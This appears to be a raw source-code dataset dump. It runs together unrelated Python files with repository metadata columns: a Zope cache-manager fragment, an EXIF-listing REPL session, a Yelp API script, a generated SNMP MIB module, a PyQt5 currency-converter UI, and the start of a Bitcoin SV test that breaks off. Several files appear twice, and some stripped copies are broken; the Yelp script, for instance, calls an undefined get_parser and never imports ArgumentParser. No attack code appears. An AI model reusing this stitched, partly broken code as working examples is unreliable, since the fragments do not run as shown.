        behavior that can only be specific to the cacheable object.
        """
        # The base implementation contributes no extra configuration UI.
        return ''
# Apply the security declarations accumulated on the class above.
InitializeClass(Cacheable)
def findCacheables(ob, manager_id, require_assoc, subfolders,
                   meta_types, rval, path):
    """
    Used by the CacheManager UI. Recursive. Similar to the Zope
    "Find" function. Finds all Cacheable objects in a hierarchy.

    Result mappings are appended to ``rval`` in place; ``path`` is the
    tuple of ids leading to ``ob``.
    """
    try:
        sm = getSecurityManager()
        children = (ob.objectValues(meta_types) if meta_types
                    else ob.objectValues())
        # Collect every cacheable child the current user may configure.
        for child in children:
            if not isCacheable(child):
                continue
            associated = child.ZCacheable_getManagerId() == manager_id
            if require_assoc and not associated:
                continue
            if not sm.checkPermission('Change cache settings', child):
                continue
            child_path = path + (child.getId(),)
            rval.append({
                'sortkey': child_path,
                'path': '/'.join(child_path),
                'title': getattr(aq_base(child), 'title', ''),
                'icon': None,
                'associated': associated,
            })
        # Recurse into containers when requested.
        if subfolders:
            if meta_types:
                # The filtered listing above may have excluded folders,
                # so fetch the full set of children for recursion.
                children = ob.objectValues()
            for child in children:
                if not hasattr(aq_base(child), 'objectValues'):
                    continue
                if sm.checkPermission(
                        'Access contents information', child):
                    findCacheables(
                        child, manager_id, require_assoc,
                        subfolders, meta_types, rval,
                        path + (child.getId(),))
    except Exception:
        # Deliberately best-effort: a broken subtree must not abort the
        # whole search, but leave a trace for debugging.
        import traceback
        traceback.print_exc()
class Cache(object):
    """
    A base class (and interface description) for caches.
    Note that Cache objects are not intended to be visible by
    restricted code.
    """
    def ZCache_invalidate(self, ob):
        """Remove all cache entries that apply to ``ob``."""
        raise NotImplementedError
    def ZCache_get(self, ob, view_name, keywords, mtime_func, default):
        """Return the cached value for ``ob``, or ``default`` on a miss."""
        # view_name: If an object provides different views that would
        # benefit from caching, it will set view_name.
        # Otherwise view_name will be an empty string.
        #
        # keywords: Either None or a mapping containing keys that
        # distinguish this cache entry from others even though
        # ob and view_name are the same. DTMLMethods use keywords
        # derived from the DTML namespace.
        #
        # mtime_func: When the Cache calls ZCacheable_getModTime(),
        # it should pass this as an argument. It is provided to
        # allow cacheable objects to provide their own computation
        # of the object's modification time.
        #
        # default: If no entry is found, ZCache_get() should return
        # default.
        raise NotImplementedError
    def ZCache_set(self, ob, data, view_name, keywords, mtime_func):
        """Store ``data`` as the cached value for ``ob``."""
        # See ZCache_get() for parameter descriptions.
        raise NotImplementedError
class CacheManager(object):
    """
    A base class for cache managers. Implement ZCacheManager_getCache().
    """
    security = ClassSecurityInfo()
    security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))
    @security.private
    def ZCacheManager_getCache(self):
        # Subclasses must return the Cache instance this manager controls.
        raise NotImplementedError
    # NOTE(review): marker attribute; appears to identify cache managers
    # to other code in this module -- confirm where it is tested.
    _isCacheManager = 1
    manage_options = (
        {
            'label': 'Associate',
            'action': 'ZCacheManager_associate',
        },
    )
    def manage_afterAdd(self, item, container):
        # Adds self to the list of cache managers in the container.
        if aq_base(self) is aq_base(item):
            ids = getVerifiedManagerIds(container)
            id = self.getId()
            if id not in ids:
                setattr(container, ZCM_MANAGERS, ids + (id,))
            # Bump the global timestamp so volatile cache references held
            # by Cacheable objects get re-resolved (see
            # ZCacheable_getCache).
            global manager_timestamp
            manager_timestamp = time.time()
    def manage_beforeDelete(self, item, container):
        # Removes self from the list of cache managers.
        if aq_base(self) is aq_base(item):
            ids = getVerifiedManagerIds(container)
            id = self.getId()
            if id in ids:
                manager_ids = [s for s in ids if s != id]
                if manager_ids:
                    setattr(container, ZCM_MANAGERS, manager_ids)
                # NOTE(review): this branch checks and removes the
                # manager-list attribute on *self* rather than on
                # *container* -- confirm that is intended.
                elif getattr(aq_base(self), ZCM_MANAGERS, None) is not None:
                    delattr(self, ZCM_MANAGERS)
            # Invalidate volatile cache references everywhere.
            global manager_timestamp
            manager_timestamp = time.time()
    security.declareProtected(ChangeCacheSettingsPermission, 'ZCacheManager_associate') # NOQA: D001,E501
    # DTML-based management form backing the "Associate" tab.
    ZCacheManager_associate = DTMLFile('dtml/cmassoc', globals())
    @security.protected(ChangeCacheSettingsPermission)
    # NOTE(review): the mutable default ``meta_types=[]`` is only ever
    # rebound below (never mutated in place), so it is harmless here.
    def ZCacheManager_locate(
        self,
        require_assoc,
        subfolders,
        meta_types=[],
        REQUEST=None
    ):
        """Locates cacheable objects.

        Searches the parent hierarchy via findCacheables() and returns
        the list of result mappings; when REQUEST is given, renders the
        "Associate" form with the results instead.
        """
        ob = aq_parent(aq_inner(self))
        rval = []
        manager_id = self.getId()
        if '' in meta_types:
            # User selected "All".
            meta_types = []
        findCacheables(
            ob,
            manager_id,
            require_assoc,
            subfolders,
            meta_types,
            rval,
            ()
        )
        if REQUEST is not None:
            return self.ZCacheManager_associate(
                self,
                REQUEST,
                show_results=1,
                results=rval,
                management_view="Associate"
            )
        return rval
    @security.protected(ChangeCacheSettingsPermission)
    def ZCacheManager_setAssociations(self, props=None, REQUEST=None):
        """Associates and un-associates cacheable objects with this
        cache manager.

        ``props`` maps form keys of the shape ``associate_<path>`` to a
        boolean-ish value; when omitted, REQUEST.form is used.
        """
        addcount = 0
        remcount = 0
        parent = aq_parent(aq_inner(self))
        sm = getSecurityManager()
        my_id = str(self.getId())
        if props is None:
            props = REQUEST.form
        for key, do_associate in props.items():
            # len('associate_') == 10; the remainder of the key is the
            # path of the object relative to our parent.
            if key[:10] == 'associate_':
                path = key[10:]
                ob = parent.restrictedTraverse(path)
                if not sm.checkPermission('Change cache settings', ob):
                    raise Unauthorized
                if not isCacheable(ob):
                    # Not a cacheable object.
                    continue
                manager_id = str(ob.ZCacheable_getManagerId())
                if do_associate:
                    if manager_id != my_id:
                        ob.ZCacheable_setManagerId(my_id)
                        addcount = addcount + 1
                else:
                    if manager_id == my_id:
                        ob.ZCacheable_setManagerId(None)
                        remcount = remcount + 1
        if REQUEST is not None:
            return self.ZCacheManager_associate(
                self, REQUEST, management_view="Associate",
                manage_tabs_message='%d association(s) made, %d removed.' %
                (addcount, remcount)
            )
# Apply the security declarations accumulated on the class above.
InitializeClass(CacheManager)
| 2,421 | 0 | 256 |
6d5b358806daeac1d711a019e32d0fd9b2e7663a | 1,830 | py | Python | Planeacion vuelo.py | ogarcia1704/Planeacion-del-vuelo-de-Dron | dc8a4ae818463c5450a5dfb8045c8361a8dfab71 | [
"MIT"
] | null | null | null | Planeacion vuelo.py | ogarcia1704/Planeacion-del-vuelo-de-Dron | dc8a4ae818463c5450a5dfb8045c8361a8dfab71 | [
"MIT"
] | null | null | null | Planeacion vuelo.py | ogarcia1704/Planeacion-del-vuelo-de-Dron | dc8a4ae818463c5450a5dfb8045c8361a8dfab71 | [
"MIT"
] | null | null | null | Python 3.7.3 (v3.7.3:ef4ec6ed12, Mar 25 2019, 21:26:53) [MSC v.1916 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
>>> from exif import Image
>>> with open('C:\\Users\\oswal\\Pictures\\oswaldo.jpg', 'rb') as image_file:
... my_image = Image(image_file)
...
>>> dir(my_image)
['_exif_ifd_pointer', '_gps_ifd_pointer', '_interoperability_ifd_Pointer', '_segments', 'cfa_pattern', 'color_space', 'components_configuration', 'compressed_bits_per_pixel', 'compression', 'contrast', 'custom_rendered', 'datetime', 'datetime_digitized', 'datetime_original', 'digital_zoom_ratio', 'exif_version', 'exposure_bias_value', 'exposure_mode', 'exposure_program', 'exposure_time', 'f_number', 'file_source', 'flash', 'flashpix_version', 'focal_length', 'focal_length_in_35mm_film', 'gain_control', 'get', 'get_file', 'gps_altitude', 'gps_altitude_ref', 'gps_datestamp', 'gps_latitude', 'gps_latitude_ref', 'gps_longitude', 'gps_longitude_ref', 'gps_map_datum', 'gps_satellites', 'gps_timestamp', 'gps_version_id', 'jpeg_interchange_format', 'jpeg_interchange_format_length', 'light_source', 'make', 'maker_note', 'max_aperture_value', 'metering_mode', 'model', 'orientation', 'photographic_sensitivity', 'pixel_x_dimension', 'pixel_y_dimension', 'resolution_unit', 'saturation', 'scene_capture_type', 'scene_type', 'sensing_method', 'sensitivity_type', 'sharpness', 'software', 'subject_distance_range', 'subsec_time', 'subsec_time_digitized', 'subsec_time_original', 'user_comment', 'white_balance', 'x_resolution', 'y_and_c_positioning', 'y_resolution']
>>> import pandas as pd
>>> data = pd.DataFrame(dir(my_image))
>>> datatoexcel = pd.ExcelWriter("CaracteristicasImagen.xlsx",engine='xlsxwriter')
>>> data.to_excel(datatoexcel, sheet_name='Sheet1')
>>> datatoexcel.save()
| 130.714286 | 1,266 | 0.747541 | Python 3.7.3 (v3.7.3:ef4ec6ed12, Mar 25 2019, 21:26:53) [MSC v.1916 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
>>> from exif import Image
>>> with open('C:\\Users\\oswal\\Pictures\\oswaldo.jpg', 'rb') as image_file:
... my_image = Image(image_file)
...
>>> dir(my_image)
['_exif_ifd_pointer', '_gps_ifd_pointer', '_interoperability_ifd_Pointer', '_segments', 'cfa_pattern', 'color_space', 'components_configuration', 'compressed_bits_per_pixel', 'compression', 'contrast', 'custom_rendered', 'datetime', 'datetime_digitized', 'datetime_original', 'digital_zoom_ratio', 'exif_version', 'exposure_bias_value', 'exposure_mode', 'exposure_program', 'exposure_time', 'f_number', 'file_source', 'flash', 'flashpix_version', 'focal_length', 'focal_length_in_35mm_film', 'gain_control', 'get', 'get_file', 'gps_altitude', 'gps_altitude_ref', 'gps_datestamp', 'gps_latitude', 'gps_latitude_ref', 'gps_longitude', 'gps_longitude_ref', 'gps_map_datum', 'gps_satellites', 'gps_timestamp', 'gps_version_id', 'jpeg_interchange_format', 'jpeg_interchange_format_length', 'light_source', 'make', 'maker_note', 'max_aperture_value', 'metering_mode', 'model', 'orientation', 'photographic_sensitivity', 'pixel_x_dimension', 'pixel_y_dimension', 'resolution_unit', 'saturation', 'scene_capture_type', 'scene_type', 'sensing_method', 'sensitivity_type', 'sharpness', 'software', 'subject_distance_range', 'subsec_time', 'subsec_time_digitized', 'subsec_time_original', 'user_comment', 'white_balance', 'x_resolution', 'y_and_c_positioning', 'y_resolution']
>>> import pandas as pd
>>> data = pd.DataFrame(dir(my_image))
>>> datatoexcel = pd.ExcelWriter("CaracteristicasImagen.xlsx",engine='xlsxwriter')
>>> data.to_excel(datatoexcel, sheet_name='Sheet1')
>>> datatoexcel.save()
| 0 | 0 | 0 |
86b2124c42fbfbb4dcc93fef5c42abfa9a7f60e0 | 612 | py | Python | Github, Yelp, YouTube/yelp_get_business.py | nraythz/Data-Mining | ed5a61e01a68aae5e8c8b86d405613ccfb6a01b6 | [
"MIT"
] | null | null | null | Github, Yelp, YouTube/yelp_get_business.py | nraythz/Data-Mining | ed5a61e01a68aae5e8c8b86d405613ccfb6a01b6 | [
"MIT"
] | null | null | null | Github, Yelp, YouTube/yelp_get_business.py | nraythz/Data-Mining | ed5a61e01a68aae5e8c8b86d405613ccfb6a01b6 | [
"MIT"
] | null | null | null | from yelp_client import get_yelp_client
if __name__ == '__main__':
client = get_yelp_client()
parser = get_parser()
args = parser.parse_args()
params = {
'lang': args.language
}
response = client.get_business(args.id, **params)
business = response.business
print("Review count: {}".format(business.review_count))
for review in business.reviews:
print("{} (by {})".format(review.excerpt, review.user.name)) | 26.608696 | 68 | 0.658497 | from yelp_client import get_yelp_client
def get_parser():
parser = ArgumentParser()
parser.add_argument('--id')
parser.add_argument('--language', default='en')
return parser
if __name__ == '__main__':
client = get_yelp_client()
parser = get_parser()
args = parser.parse_args()
params = {
'lang': args.language
}
response = client.get_business(args.id, **params)
business = response.business
print("Review count: {}".format(business.review_count))
for review in business.reviews:
print("{} (by {})".format(review.excerpt, review.user.name)) | 128 | 0 | 23 |
95abe76fd0e0ba6ce75062af453000dc541c9f26 | 3,189 | py | Python | pysnmp-with-texts/ATTO-PRODUCTS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/ATTO-PRODUCTS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/ATTO-PRODUCTS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module ATTO-PRODUCTS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ATTO-PRODUCTS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:31:53 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibIdentifier, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, IpAddress, NotificationType, ObjectIdentity, Bits, Counter64, ModuleIdentity, Integer32, iso, enterprises, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "IpAddress", "NotificationType", "ObjectIdentity", "Bits", "Counter64", "ModuleIdentity", "Integer32", "iso", "enterprises", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Module identity: anchors this MIB at enterprises.4547.3.2 and records
# its revision metadata (only when the pysmi/pysnmp builder loads texts).
attoProductsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 4547, 3, 2))
attoProductsMIB.setRevisions(('2013-04-19 13:45',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: attoProductsMIB.setRevisionsDescriptions(('Initial version of this module.',))
if mibBuilder.loadTexts: attoProductsMIB.setLastUpdated('201304191345Z')
if mibBuilder.loadTexts: attoProductsMIB.setOrganization('ATTO Technology, Inc.')
if mibBuilder.loadTexts: attoProductsMIB.setContactInfo('ATTO Technology 155 Crosspoint Parkway Amherst NY 14068 EMail: <support@attotech.com>')
if mibBuilder.loadTexts: attoProductsMIB.setDescription('This modules defines object identifiers assigned to various hardware platforms, which are returned as values for sysObjectID.')
# OID registry: ATTO's private enterprise subtree (1.3.6.1.4.1.4547) and
# the product/management branches beneath it.
attotech = MibIdentifier((1, 3, 6, 1, 4, 1, 4547))
attoProducts = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1))
attoMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 2))
attoModules = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 3))
attoAgentCapability = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 4))
attoGenericDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 1))
attoHba = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 3))
attoFB6500 = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 4))
attoFB6500N = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 5))
# Export the symbols so other MIB modules can import them by name.
mibBuilder.exportSymbols("ATTO-PRODUCTS-MIB", attoFB6500=attoFB6500, attoModules=attoModules, attotech=attotech, attoMgmt=attoMgmt, attoProductsMIB=attoProductsMIB, attoFB6500N=attoFB6500N, attoHba=attoHba, attoGenericDevice=attoGenericDevice, attoProducts=attoProducts, attoAgentCapability=attoAgentCapability, PYSNMP_MODULE_ID=attoProductsMIB)
| 96.636364 | 505 | 0.770147 | #
# PySNMP MIB module ATTO-PRODUCTS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ATTO-PRODUCTS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:31:53 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibIdentifier, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, IpAddress, NotificationType, ObjectIdentity, Bits, Counter64, ModuleIdentity, Integer32, iso, enterprises, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "IpAddress", "NotificationType", "ObjectIdentity", "Bits", "Counter64", "ModuleIdentity", "Integer32", "iso", "enterprises", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
attoProductsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 4547, 3, 2))
attoProductsMIB.setRevisions(('2013-04-19 13:45',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: attoProductsMIB.setRevisionsDescriptions(('Initial version of this module.',))
if mibBuilder.loadTexts: attoProductsMIB.setLastUpdated('201304191345Z')
if mibBuilder.loadTexts: attoProductsMIB.setOrganization('ATTO Technology, Inc.')
if mibBuilder.loadTexts: attoProductsMIB.setContactInfo('ATTO Technology 155 Crosspoint Parkway Amherst NY 14068 EMail: <support@attotech.com>')
if mibBuilder.loadTexts: attoProductsMIB.setDescription('This modules defines object identifiers assigned to various hardware platforms, which are returned as values for sysObjectID.')
attotech = MibIdentifier((1, 3, 6, 1, 4, 1, 4547))
attoProducts = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1))
attoMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 2))
attoModules = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 3))
attoAgentCapability = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 4))
attoGenericDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 1))
attoHba = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 3))
attoFB6500 = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 4))
attoFB6500N = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 5))
mibBuilder.exportSymbols("ATTO-PRODUCTS-MIB", attoFB6500=attoFB6500, attoModules=attoModules, attotech=attotech, attoMgmt=attoMgmt, attoProductsMIB=attoProductsMIB, attoFB6500N=attoFB6500N, attoHba=attoHba, attoGenericDevice=attoGenericDevice, attoProducts=attoProducts, attoAgentCapability=attoAgentCapability, PYSNMP_MODULE_ID=attoProductsMIB)
| 0 | 0 | 0 |
4cff55d59a297ba96c50675dc06b9a8322c3cd91 | 326 | py | Python | setup.py | jaketeater/simpleusbrelay | bf300f339d2a74f0a041d3dbf5a7d8cc8c81cf46 | [
"MIT"
] | 5 | 2015-05-26T08:18:56.000Z | 2020-02-16T01:34:51.000Z | setup.py | jaketeater/simpleusbrelay | bf300f339d2a74f0a041d3dbf5a7d8cc8c81cf46 | [
"MIT"
] | 5 | 2015-02-22T01:25:51.000Z | 2018-02-17T23:38:32.000Z | setup.py | patrickjahns/simpleusbrelay | 25c8cddbbb25637f652276824d1f38213b275a0b | [
"MIT"
] | 4 | 2016-09-14T14:13:32.000Z | 2021-03-19T00:57:56.000Z | from distutils.core import setup
setup(
name='python-simple-usbrelay',
url='https://github.com/patrickjahns/simpleusbrelay',
version='0.1',
packages=['simpleusbarray'],
author='Patrick Jahns',
author_email='patrick.jahns@gmail.com',
license='MIT',
long_description=open('README.rst').read()
)
| 25.076923 | 57 | 0.687117 | from distutils.core import setup
setup(
name='python-simple-usbrelay',
url='https://github.com/patrickjahns/simpleusbrelay',
version='0.1',
packages=['simpleusbarray'],
author='Patrick Jahns',
author_email='patrick.jahns@gmail.com',
license='MIT',
long_description=open('README.rst').read()
)
| 0 | 0 | 0 |
00642f4514d7506cee5b16f6b6a0b39842e9b1bf | 5,811 | py | Python | View/PY/ui_ConvertCoinUI.py | GeovaniTech/ConversorDeMoedas | 5bcab918b036f84711bd05eb2169c85accb7fb79 | [
"MIT"
] | null | null | null | View/PY/ui_ConvertCoinUI.py | GeovaniTech/ConversorDeMoedas | 5bcab918b036f84711bd05eb2169c85accb7fb79 | [
"MIT"
] | null | null | null | View/PY/ui_ConvertCoinUI.py | GeovaniTech/ConversorDeMoedas | 5bcab918b036f84711bd05eb2169c85accb7fb79 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ConvertCoinUI.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from View.PY import ConQRC
| 51.424779 | 108 | 0.703149 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ConvertCoinUI.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ConversorDeMoeda(object):
    """pyuic5-generated UI for the currency-converter main window.

    Do not hand-edit the widget setup below: per the file header, it is
    regenerated from ConvertCoinUI.ui and manual changes will be lost.
    """
    def setupUi(self, ConversorDeMoeda):
        # Builds every widget, geometry and stylesheet of the window.
        ConversorDeMoeda.setObjectName("ConversorDeMoeda")
        ConversorDeMoeda.resize(821, 532)
        ConversorDeMoeda.setMinimumSize(QtCore.QSize(805, 532))
        ConversorDeMoeda.setMaximumSize(QtCore.QSize(821, 532))
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(":/Icons and Images/Logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        ConversorDeMoeda.setWindowIcon(icon)
        ConversorDeMoeda.setIconSize(QtCore.QSize(50, 50))
        self.TelaConv = QtWidgets.QWidget(ConversorDeMoeda)
        self.TelaConv.setObjectName("TelaConv")
        # Amount input field.
        self.line_valor = QtWidgets.QLineEdit(self.TelaConv)
        self.line_valor.setGeometry(QtCore.QRect(90, 310, 271, 51))
        self.line_valor.setStyleSheet("background-color: rgba(0, 0 , 0, 0);\n"
"border: 2px solid rgba(0,0,0,0);\n"
"border-bottom-color: #A9ACF9;\n"
"color: rgb(0,0,0);\n"
"padding-bottom: 8px;\n"
"border-radius: 0px;\n"
"font: 10pt \"Montserrat\";")
        self.line_valor.setText("")
        self.line_valor.setEchoMode(QtWidgets.QLineEdit.Normal)
        self.line_valor.setClearButtonEnabled(False)
        self.line_valor.setObjectName("line_valor")
        self.simbolo_inicial = QtWidgets.QLabel(self.TelaConv)
        self.simbolo_inicial.setGeometry(QtCore.QRect(80, 370, 71, 111))
        self.simbolo_inicial.setStyleSheet("font: 25 50pt \"Corbel Light\";\n"
"color: #A9ACF9;")
        self.simbolo_inicial.setObjectName("simbolo_inicial")
        self.lbl_de = QtWidgets.QLabel(self.TelaConv)
        self.lbl_de.setGeometry(QtCore.QRect(380, 340, 31, 21))
        self.lbl_de.setStyleSheet("font: 25 20pt \"Corbel Light\";\n"
"color: #A9ACF9;")
        self.lbl_de.setObjectName("lbl_de")
        self.lbl_para = QtWidgets.QLabel(self.TelaConv)
        self.lbl_para.setGeometry(QtCore.QRect(550, 340, 61, 21))
        self.lbl_para.setStyleSheet("font: 25 20pt \"Corbel Light\";\n"
"color: #A9ACF9;")
        self.lbl_para.setObjectName("lbl_para")
        # Source/target currency selectors.
        self.conv_cambio = QtWidgets.QComboBox(self.TelaConv)
        self.conv_cambio.setGeometry(QtCore.QRect(610, 340, 121, 22))
        self.conv_cambio.setEditable(False)
        self.conv_cambio.setFrame(False)
        self.conv_cambio.setObjectName("conv_cambio")
        self.conv_inicial = QtWidgets.QComboBox(self.TelaConv)
        self.conv_inicial.setGeometry(QtCore.QRect(420, 340, 121, 22))
        self.conv_inicial.setEditable(False)
        self.conv_inicial.setFrame(False)
        self.conv_inicial.setObjectName("conv_inicial")
        self.ImagenPorco = QtWidgets.QLabel(self.TelaConv)
        self.ImagenPorco.setGeometry(QtCore.QRect(260, 50, 321, 231))
        self.ImagenPorco.setText("")
        self.ImagenPorco.setPixmap(QtGui.QPixmap(":/Icons and Images/Porco.svg"))
        self.ImagenPorco.setScaledContents(True)
        self.ImagenPorco.setObjectName("ImagenPorco")
        self.lbl_vale = QtWidgets.QLabel(self.TelaConv)
        self.lbl_vale.setGeometry(QtCore.QRect(345, 410, 61, 51))
        self.lbl_vale.setStyleSheet("font: 25 25pt \"Corbel Light\";\n"
"color: #4DC724;")
        self.lbl_vale.setObjectName("lbl_vale")
        self.lbl_valor_inicial = QtWidgets.QLabel(self.TelaConv)
        self.lbl_valor_inicial.setGeometry(QtCore.QRect(150, 390, 191, 81))
        self.lbl_valor_inicial.setStyleSheet("font: 25 35pt \"Corbel Light\";\n"
"color: rgb(162, 162, 162);")
        self.lbl_valor_inicial.setObjectName("lbl_valor_inicial")
        self.lbl_hoje = QtWidgets.QLabel(self.TelaConv)
        self.lbl_hoje.setGeometry(QtCore.QRect(670, 410, 71, 51))
        self.lbl_hoje.setStyleSheet("font: 25 25pt \"Corbel Light\";\n"
"color: #4DC724;")
        self.lbl_hoje.setObjectName("lbl_hoje")
        self.simbolo_cambio = QtWidgets.QLabel(self.TelaConv)
        self.simbolo_cambio.setGeometry(QtCore.QRect(410, 370, 71, 111))
        self.simbolo_cambio.setStyleSheet("font: 25 50pt \"Corbel Light\";\n"
"color: #A9ACF9;")
        self.simbolo_cambio.setObjectName("simbolo_cambio")
        self.lbl_valor_cambio = QtWidgets.QLabel(self.TelaConv)
        self.lbl_valor_cambio.setGeometry(QtCore.QRect(480, 390, 191, 81))
        self.lbl_valor_cambio.setStyleSheet("font: 25 35pt \"Corbel Light\";\n"
"color: rgb(162, 162, 162);")
        self.lbl_valor_cambio.setObjectName("lbl_valor_cambio")
        ConversorDeMoeda.setCentralWidget(self.TelaConv)
        self.retranslateUi(ConversorDeMoeda)
        QtCore.QMetaObject.connectSlotsByName(ConversorDeMoeda)
    def retranslateUi(self, ConversorDeMoeda):
        # Installs all user-visible strings through Qt's translation hook.
        _translate = QtCore.QCoreApplication.translate
        ConversorDeMoeda.setWindowTitle(_translate("ConversorDeMoeda", "Convert Coin - Conversor de Moeda"))
        self.line_valor.setPlaceholderText(_translate("ConversorDeMoeda", "Valor"))
        self.simbolo_inicial.setText(_translate("ConversorDeMoeda", "R$"))
        self.lbl_de.setText(_translate("ConversorDeMoeda", "De"))
        self.lbl_para.setText(_translate("ConversorDeMoeda", "Para"))
        self.lbl_vale.setText(_translate("ConversorDeMoeda", "Vale"))
        self.lbl_valor_inicial.setText(_translate("ConversorDeMoeda", "0,000000"))
        self.lbl_hoje.setText(_translate("ConversorDeMoeda", "Hoje"))
        self.simbolo_cambio.setText(_translate("ConversorDeMoeda", "R$"))
        self.lbl_valor_cambio.setText(_translate("ConversorDeMoeda", "0,000000"))
from View.PY import ConQRC
| 5,355 | 13 | 76 |
0ab4866064011fcd766538dbf133d0c60bbbe2df | 3,644 | py | Python | test/functional/bsv-toobusyrejectmessage.py | bxlkm1/yulecoin | 3605faf2ff2e3c7bd381414613fc5c0234ad2936 | [
"OML"
] | 8 | 2019-08-02T02:49:42.000Z | 2022-01-17T15:51:48.000Z | test/functional/bsv-toobusyrejectmessage.py | bxlkm1/yulecoin | 3605faf2ff2e3c7bd381414613fc5c0234ad2936 | [
"OML"
] | null | null | null | test/functional/bsv-toobusyrejectmessage.py | bxlkm1/yulecoin | 3605faf2ff2e3c7bd381414613fc5c0234ad2936 | [
"OML"
] | 4 | 2019-08-02T02:50:44.000Z | 2021-05-28T03:21:38.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin SV developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import p2p_port, disconnect_nodes
from test_framework.blocktools import create_block, create_coinbase, assert_equal
import datetime
# This test checks TOOBUSY reject message and behaviour that it triggers.
# Scenario 1:
# 2 nodes (A and B) send HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A then sends REJECT_TOOBUSY message. After that, node B should be asked for the same block (GetData).
# Scenario 2:
